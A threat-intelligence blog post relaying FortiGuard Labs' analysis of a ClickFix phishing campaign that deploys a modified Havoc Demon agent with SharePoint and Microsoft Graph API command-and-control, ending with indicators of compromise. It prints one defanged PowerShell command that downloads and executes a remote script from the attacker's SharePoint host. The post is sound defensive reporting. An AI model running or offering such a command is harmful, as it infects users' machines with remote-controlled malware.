X-Industry

Havoc Threat Campaigns

Posted by CyberDog on March 6, 2025 at 12:00pm

13513168072?profile=RESIZE_400xHavoc is a powerful command-and-control (C2) framework. Like other well-known C2 frameworks, such as Cobalt Strike, Silver, and Winos4.0, Havoc has been used in threat campaigns to gain complete control over the target. Additionally, It is open-source and available on GitHub, making it easier for threat actors to modify it to evade detection.

FortiGuard Labs recently discovered a phishing campaign that combines ClickFix and multi-stage malware to deploy a modified Havoc Demon Agent. The threat actor hides each malware stage behind a SharePoint site and uses a modified version of Havoc Demon with the Microsoft Graph API to obscure C2 communications within trusted, well-known services. Figure 1 shows the attack chain.

13513184278?profile=RESIZE_710xFigure 1: Attack flow
Initial Access - The attack campaign starts with a phishing email containing an HTML file as an attachment, as illustrated in Figure 2.

It uses a brief explanation and an urgent tone to prompt the recipient to open the attachment immediately.

13513168092?profile=RESIZE_584xFigure 2: The phishing e-mail
The attachment, “Documents.html,” is a ClickFix attack that embeds a fake error message and instructions in HTML to deceive users into copying and pasting a malicious PowerShell command into their terminal or PowerShell, ultimately executing malicious code.

13513184291?profile=RESIZE_584xFigure 3: Document.html using ClickFix social engineering tactic
Decoding the base64-encoded string shown in Figure 3 reveals a PowerShell command that downloads and executes a remote

PowerShell script.
PowerShell -w h -c "iwr ‘hxxps://hao771[.]sharepoint.com/_layouts/15/download.aspx?share=EU7smZuKo-pDixZ26BSAaX0BVVcF5VkOc7qEvjsDSAH9OQ'|iex"
payload_20250112_074319.ps1

The Script file is hosted in SharePoint and controlled by the threat actor. When the script runs, it checks whether the execution environment is a sandbox by verifying the number of domain computers. It then deletes all registry entries under HKCU:\Software\Microsoft with names starting with "zr_" and adds the specified property as an infection marker, as shown in Figure 4.
13513184300?profile=RESIZE_710xFigure 4: PowerShell script for sandbox evasion and infection tagging
Next, the script verifies the existence of pythonw.exe. If it’s not found, it downloads the Python interpreter. Otherwise, it directly runs the Python script. Finally, the remote Python script is retrieved and executed in hidden windows to obscure malicious activity, as shown in Figure 5.

13513214055?profile=RESIZE_584xFigure 5: PowerShell script for downloading and executing the remote Python script
Python Shellcode Loader - payload_20250107_015913.py - Like the PowerShell script, the Python script is hosted on the same SharePoint. It contains debug information written in Russian and serves as a shellcode loader.
Researchers executed the script directly with the Python interpreter in the terminal. The log displays “Выделение памяти” (memory allocation), "Запись в память” (write to memory), "Выполнение shellcode” (execution of shellcode), and " Завершение выполнения скрипта” (script execution completion) in sequence, indicating successful shellcode execution, as seen in Figure 6.

13513207474?profile=RESIZE_584xFigure 6: Python script for shellcode execution
KaynLdr - KaynLdr is a Github Shellcode Loader designed to load an embedded DLL reflectively. It complicates analysis using API hashing with a modified DJB2 algorithm and leverages resolved ntdll APIs for memory allocation and mapping. The instruction “call rax” executes the embedded DLL's entry point, as shown in Figure 7.

13513207474?profile=RESIZE_584xFigure 7: Executing the dll with KaynLDR shellcode loader
Havoc Demon DLL - Havoc is an open-source post-exploitation command and control framework used in red teaming exercises and attack campaigns to gain complete control over compromised targets. In this attack campaign, we observed that the threat actor uses Havoc with the Microsoft Graph API to conceal C2 communication within well-known services. The modified Havoc Demon DLL still starts with DemonInit and uses the same hash algorithm as KaynLdr to retrieve the necessary APIs and initialize the configuration objects.

13513223091?profile=RESIZE_584xFigure 8: DemonMain in the modified Havoc Demon DLL and the retrieved APIs are stored in the structure beginning at address 0xb6
The second function, “SharePointC2Init,” initializes files on the actors' SharePoint site using the Microsoft Graph API. It first combines the hardcoded shared secret with the necessary parameters for a POST request. It then sends the request to the /token endpoint of the Microsoft Identity Platform to obtain access tokens for Microsoft Graph APIs.

13513213083?profile=RESIZE_710xFigure 9: Access token request with a hardcoded shared secret
Next, it utilizes the obtained token to create two files in SharePoint's default document library by making a PUT request, as shown in Figure 10.
13513213089?profile=RESIZE_710xFigure 10: Creating a file in the root folder
The Havoc AgentID generates the VictimID as a filename, concatenated with the suffix “pD9-tKout/pD9-tKin” to indicate their purpose.
13513277252?profile=RESIZE_710xTable 1: Two files utilized for Sharepoint C2 to control the target.
The initial packet sent to C2 is a CheckIn request containing data gathered from the DemonMetaData function. In this step, the victim's information—such as Host Name, User Name, Domain Name, IP Address, Process Details, OS Information, whether the user has an elevated account, and the configuration in the Demon DLL—is sent to the C2 server. All content is encrypted using the AES-256 algorithm in CTR mode with a randomly generated 256-bit key and a 128-bit IV. Finally, it is combined with the header, as illustrated in Figure 11, before being sent to the C2 server via the TransportSend function.

13513282268?profile=RESIZE_710xFigure 11: The contents of CheckIn request and Metadata Structure in Havoc Github
The TransportSend function has been modified to communicate with the C2 by accessing two files: {VictimID}pD9-tKout and {VictimID}pD9-tKin. It updates the request to the “{VictimID}pD9-tKout” file and then retrieves the response from the C2 by using Microsoft Graph API with the GET method to access the contents of the ‘{VictimID}pD9-tKin’ file. If the response is successfully retrieved, the content of file '{VictimID}pD9-tKin' is immediately erased.

13513282472?profile=RESIZE_584xFigure 12: The modified TransportSend function and the function “FetchInFile”
Next, the content in the response is compared with the AgentID. If they match, the session. The connected flag is set, and it enters the dispatcher routine to await new tasks from the attacker. In the dispatcher routine, the agent sends a 'Get Job' request and parses the response into Command ID, Request ID, and task. Although we only observed DEMON_COMMAND_NO_JOB (Command ID: 0xA) during our analysis, as shown below, we found that the task would be decrypted and executed if a different command ID exists and is not 0xA in the program.

13513288652?profile=RESIZE_400xFigure 13: Accessing the contents of the ‘{VictimID}pD9-tKin’ file
The supported commands are the same as those in Havoc Github, as shown in Figure 14. They include gathering information about the target, file operations, command and payload execution, token manipulation, and Kerberos Attacks.
13513291056?profile=RESIZE_710xFigure 14: The primary function for executing the Demon command

Conclusion - In addition to staying alert for phishing emails, guided messages that encourage opening a terminal or PowerShell must be handled with extra caution to prevent inadvertently downloading and executing malicious commands.
In this article, Fortinet uncovered the execution flow and the altered open-source post-exploitation framework used in this attack. Public services once again play a crucial role in the attack campaign, now further integrated with modified Havoc Demon to hide malicious communication within the Microsoft Graph API, making identification and detection even more challenging.

IOCs
C2
hao771[.]sharepoint.com
Files
51796effe230d9eca8ec33eb17de9c27e9e96ab52e788e3a9965528be2902330
989f58c86343704f143c0d9e16893fad98843b932740b113e8b2f8376859d2dd
A5210aaa9eb51e866d9c2ef17f55c0526732eacb1a412b910394b6b51246b7da
cc151456cf7df7ff43113e5f82c4ce89434ab40e68cd6fb362e4ae4f70ce65b3

 

This article is shared at no charge and is for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com

• Reporting: https://www.redskyalliance.org/
• Website: https://www.redskyalliance.com/
• LinkedIn: https://www.linkedin.com/company/64265941

Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122

Views: 44
Tags: ir-25-063-001, havoc, github, phishing, powershell, microsoft graph api, clickfix attack, python
E-mail me when people leave their comments –
Follow

You need to be a member of Red Sky Alliance to add comments!